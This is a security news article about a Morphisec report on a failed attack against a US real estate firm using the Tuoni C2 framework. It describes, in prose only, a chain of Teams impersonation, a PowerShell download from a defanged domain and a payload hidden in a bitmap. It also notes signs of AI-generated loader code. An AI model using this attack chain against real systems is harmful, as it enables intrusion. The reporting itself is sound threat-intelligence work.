Emerging Red Team tool Tuoni C2 Used in Attempted Breach of US Real Estate Firm
October 26, 2025 – A US-based real estate firm was targeted in mid-October by a cyberattack leveraging the recently released Tuoni command-and-control (C2) framework, researchers at Morphisec revealed today. The incident highlights a growing trend of malicious actors adopting tools originally designed for legitimate penetration testing and red team exercises.
Tuoni, advertised as an advanced C2 framework for security professionals, became freely available as a “Community Edition” download from GitHub in early 2024. The attackers in this case utilized Tuoni’s ability to deliver stealthy, in-memory payloads. According to Shmuel Uzan, a Morphisec researcher, ”The campaign leveraged the emerging Tuoni C2 framework…that delivers stealthy, in-memory payloads.”
The attack unfolded through a likely social engineering scheme involving Microsoft Teams impersonation, where attackers allegedly posed as trusted vendors or colleagues to trick an employee into executing a PowerShell command. This command downloaded a second powershell script from “kupaoquan[.]com,” which concealed a further payload within a bitmap image using steganographic techniques. The resulting execution of “TuoniAgent.dll” established a connection to the C2 server, granting the attackers potential remote control of the compromised machine.
Morphisec noted potential signs of AI assistance in the initial loader’s code generation, citing scripted comments and a modular structure. This incident follows a September 2025 report from Check Point detailing the weaponization of AI-powered tool HexStrike AI for accelerated vulnerability exploitation, further illustrating the evolving landscape of cyber threats. While the attack on the real estate firm was ultimately unsuccessful, it underscores the increasing misuse of legitimate security tools for malicious purposes.
